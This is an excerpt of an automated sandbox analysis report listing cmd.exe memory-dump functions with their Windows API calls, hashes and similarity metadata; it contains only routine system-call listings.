                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,?,?,00D7BFD6,?,?,?,?,?,?,?,?), ref: 00D864D4
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                          • Part of subcall function 00D772EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00D61028,?,?,?,00D7F12E,00D8CA50,00000018,00D71E7C,00000000,00000000,00D7ACE0,00000000,00000000,?,00000104,?), ref: 00D77314
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D8646C
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D86474
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D864B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 129137517-0
                                                                                        • Opcode ID: eb218dfe48806c93c8573ceaca55634674975f723b3699bff4658723e8c9c431
                                                                                        • Instruction ID: 82d218b3115c3f28bad9ad699c036be689ff688003408c7e92384afafe0302fe
                                                                                        • Opcode Fuzzy Hash: eb218dfe48806c93c8573ceaca55634674975f723b3699bff4658723e8c9c431
                                                                                        • Instruction Fuzzy Hash: 6C21D1366002056BC724BBBD9C5997F776ADF853207194628F906CB385EFB49C05C3B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D862B3 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,00D8CD20,0000001C,00D858DF), ref: 00D862E6
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,00D8CD20,0000001C,00D858DF), ref: 00D86301
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00D86340
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D8635D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$ErrorLastOpen
                                                                                        • String ID:
                                                                                        • API String ID: 4270309053-0
                                                                                        • Opcode ID: d29f36c29c2990baab679cc1dc026db60f8b161488722396daee3043ee65ec03
                                                                                        • Instruction ID: dfe8f831b3207952f92fe506a2544ddbcb8b4a1d11f840026781df9c6ed55f14
                                                                                        • Opcode Fuzzy Hash: d29f36c29c2990baab679cc1dc026db60f8b161488722396daee3043ee65ec03
                                                                                        • Instruction Fuzzy Hash: 2421FCB1D00219AFDB11AF999C81AEEB6BDEB49760F18416AE901F3240DB71DD00DBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D89FF8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8A034
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,00D6234C,0020005D), ref: 00D8A078
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8A0AA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8A0C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DriveFullNamePathType
                                                                                        • String ID:
                                                                                        • API String ID: 3442494845-0
                                                                                        • Opcode ID: 2c085cd1d7c06a55aa47eab14c197651347bde72e755a124f706507f6f2fa649
                                                                                        • Instruction ID: ba19bbd228d8032f651777c0689ba7218f2519f80b30979dba14cd27b82a40c5
                                                                                        • Opcode Fuzzy Hash: 2c085cd1d7c06a55aa47eab14c197651347bde72e755a124f706507f6f2fa649
                                                                                        • Instruction Fuzzy Hash: B1213771A0021A9BEB24DFA9DD859AFBBF8EF45344F04056BA505D3241E734DE44CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D72960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcstol.MSVCRT ref: 00D72977
                                                                                        • wcstol.MSVCRT ref: 00D72987
                                                                                        • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00D6E559,?,?,00000000,?), ref: 00D729FF
                                                                                        • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00D6E559,?,?,00000000,?), ref: 00D72A09
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcstol$lstrcmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 4273384694-0
                                                                                        • Opcode ID: 4ad63d0b0a894ce7f0d46864280cab3e993bfb925629458382ad7d8277f52464
                                                                                        • Instruction ID: 300ca22eb3ad3a6350152bf94e1b420cdc0796bd78d13e9e9108f934dc3bf689
                                                                                        • Opcode Fuzzy Hash: 4ad63d0b0a894ce7f0d46864280cab3e993bfb925629458382ad7d8277f52464
                                                                                        • Instruction Fuzzy Hash: 5C110633840296BB87215B78C90897ABA68FF01350B1D8211EA09D7A10F371EE50EEF4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8C56B
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00D8C5A5
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8C5BD
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8C5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DriveNamePathTypeVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1029679093-0
                                                                                        • Opcode ID: 5e798b56530d78756b0f448b7810efb731c16de2909b1a795ef18a5e7bb76166
                                                                                        • Instruction ID: f9825cd64c684c6e6dc435775e228f573964f59bf24ad1fee19ceaae7b60a90d
                                                                                        • Opcode Fuzzy Hash: 5e798b56530d78756b0f448b7810efb731c16de2909b1a795ef18a5e7bb76166
                                                                                        • Instruction Fuzzy Hash: 79213072A10209ABDF20DBA9DC89BAFBBF8EF45344F1804A9A505D3141E774EA44CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c35f5012d88d5b62f4c9ce9404b4a90b6fe06cfc6f8e9cb416f03fba01ab8a21
                                                                                        • Instruction ID: b21b4c927486660a3a9a4f763c0d98249546b8394b062afbb747f1344fc82ccb
                                                                                        • Opcode Fuzzy Hash: c35f5012d88d5b62f4c9ce9404b4a90b6fe06cfc6f8e9cb416f03fba01ab8a21
                                                                                        • Instruction Fuzzy Hash: 3B11EB31601704BBDB567B659C49FBE7A19EF86324F188116F806C61D0DB70EE05C772
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D89809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D89822
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D892EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8982A
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D89841
                                                                                        • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D8986E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 2448200120-0
                                                                                        • Opcode ID: 308952c8c6ebf2edbdedd553635a5631f4a5cf8ae6cc6d76eb6dc1b068973f48
                                                                                        • Instruction ID: ea8e7940d31e888fcd0af2e24f6e2ead79e1acfb9ef1242a8e31ac182c02199c
                                                                                        • Opcode Fuzzy Hash: 308952c8c6ebf2edbdedd553635a5631f4a5cf8ae6cc6d76eb6dc1b068973f48
                                                                                        • Instruction Fuzzy Hash: 6C110E31200301AFDF25BB65EC69A7FB77AEB8AB25F18012AF441D6250DB709C00CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00D89962,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D6727F
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D67286
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D672AF
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D672B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 099d32b8b64ea15014162deba14fb8264794f31978794e0b39fe72540bd914b8
                                                                                        • Instruction ID: 211c9ceac01b6a84b8e68858bd7796e43fe951d61361554deb0e91b699f810b8
                                                                                        • Opcode Fuzzy Hash: 099d32b8b64ea15014162deba14fb8264794f31978794e0b39fe72540bd914b8
                                                                                        • Instruction Fuzzy Hash: A711D0312093009FDB24AFA8D825B3A7BA1EF8A718F284549F49ACB351DB24D802D775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D662C8 Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00D66231,00000000,00000000,335C4BB4), ref: 00D6630C
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D66313
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1617791916-0
                                                                                        • Opcode ID: de32bb2a5d970f53a2eb82ca7046f83825611464cdcd2d8959c2263b27b3860e
                                                                                        • Instruction ID: 696f9437a01c94497fdfbbd64387ec9f6c9e0bb364657251f47deecceb13631a
                                                                                        • Opcode Fuzzy Hash: de32bb2a5d970f53a2eb82ca7046f83825611464cdcd2d8959c2263b27b3860e
                                                                                        • Instruction Fuzzy Hash: F611E57170571197CB245F19D824B3F6719EFC5B11F0D0118ED069B394DF21EC02A6B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00D6BDB3,00000000,?), ref: 00D6DD37
                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6DD3E
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D6DD53
                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6DD5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocSize
                                                                                        • String ID:
                                                                                        • API String ID: 2549470565-0
                                                                                        • Opcode ID: 4173974ea6854625c75c810c8fae625b0aaa4b9d31761d8f0567fb7db0bcf4fe
                                                                                        • Instruction ID: aaf5784e368655a716471a710b239c56101a9b164130606c06cec7c920416943
                                                                                        • Opcode Fuzzy Hash: 4173974ea6854625c75c810c8fae625b0aaa4b9d31761d8f0567fb7db0bcf4fe
                                                                                        • Instruction Fuzzy Hash: DF01B176B40301ABC721AB68FC88F9A77AAEB95756F280025F609C7250E731DC04CFB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D88496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884B9
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884C6
                                                                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884EA
                                                                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                        • String ID:
                                                                                        • API String ID: 1033415088-0
                                                                                        • Opcode ID: b2b56c5d916d6db5e48081bd04afc7f602dcd2b65c9e0b9cfbe78b45ab7d20f2
                                                                                        • Instruction ID: 3dc4650a68298f051927a1a0be202b83c8fca55b401f80d100cb9e18a3d150ee
                                                                                        • Opcode Fuzzy Hash: b2b56c5d916d6db5e48081bd04afc7f602dcd2b65c9e0b9cfbe78b45ab7d20f2
                                                                                        • Instruction Fuzzy Hash: E2014472A10219AF8B05AB78DC849FFB7ECEF0E711B400129F506D6150EB249D05D779
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D75643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D70060: wcschr.MSVCRT ref: 00D7006C
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00D75678
                                                                                        • _open_osfhandle.MSVCRT ref: 00D7568C
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D756A2
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8122B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                        • String ID:
                                                                                        • API String ID: 22757656-0
                                                                                        • Opcode ID: 4355be7def2427f1ae5047bf103736bf19110bd3c7aece82433ddbef98654f4d
                                                                                        • Instruction ID: 22b4d4d7c88e45e4399e601aa4f3276ac76ec32e014bf99ac6b26f4a72d22373
                                                                                        • Opcode Fuzzy Hash: 4355be7def2427f1ae5047bf103736bf19110bd3c7aece82433ddbef98654f4d
                                                                                        • Instruction Fuzzy Hash: EC01DB71900310BFD7106BACAC4DB5E7BA8E746734F214319F465E32E0E7B0484587B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D824F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00D822F8), ref: 00D82514
                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?), ref: 00D8251B
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00D822F8), ref: 00D82539
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D82540
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 524e9e7b513eaf204452c73d67a0241ad90eff8ad38fb976d3f6ffb22a78ad88
                                                                                        • Instruction ID: 268ecd524fb39da7f4cf6f6667b65fa78a7d1ec9d895c154c66f6f46aff5de52
                                                                                        • Opcode Fuzzy Hash: 524e9e7b513eaf204452c73d67a0241ad90eff8ad38fb976d3f6ffb22a78ad88
                                                                                        • Instruction Fuzzy Hash: 12F03772610701ABD7249FA4E889B66B7F8FB49312F100A29E141C6540E778E995CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68B96 Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D6885E), ref: 00D68B9D
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6885E), ref: 00D68BA4
                                                                                          • Part of subcall function 00D6A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
                                                                                          • Part of subcall function 00D6A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
                                                                                          • Part of subcall function 00D6A9D4: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
                                                                                          • Part of subcall function 00D6A9D4: memcpy.MSVCRT ref: 00D6AA09
                                                                                          • Part of subcall function 00D6A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00D6885E), ref: 00D7B5B5
                                                                                        • RtlFreeHeap.NTDLL(00000000,?,00D6885E), ref: 00D7B5BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 197374240-0
                                                                                        • Opcode ID: 6b7cea24e61448a50dcfa2e8511c59fa0661acf0a3e31397626bbfc1e7e3f92b
                                                                                        • Instruction ID: 0b5b351d514452dd4fe2094277ec0ec39e9d50b0b69c19f9d82d8e744674e469
                                                                                        • Opcode Fuzzy Hash: 6b7cea24e61448a50dcfa2e8511c59fa0661acf0a3e31397626bbfc1e7e3f92b
                                                                                        • Instruction Fuzzy Hash: 98E0487274971177D6603BBCBC0DB462A54DB45772F154112F689DA2C0EF78C840CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D76F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00D76F4F
                                                                                        • __set_app_type.MSVCRT ref: 00D76872
                                                                                        • __p__fmode.MSVCRT ref: 00D76888
                                                                                        • __p__commode.MSVCRT ref: 00D76896
                                                                                        • __setusermatherr.MSVCRT ref: 00D768B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
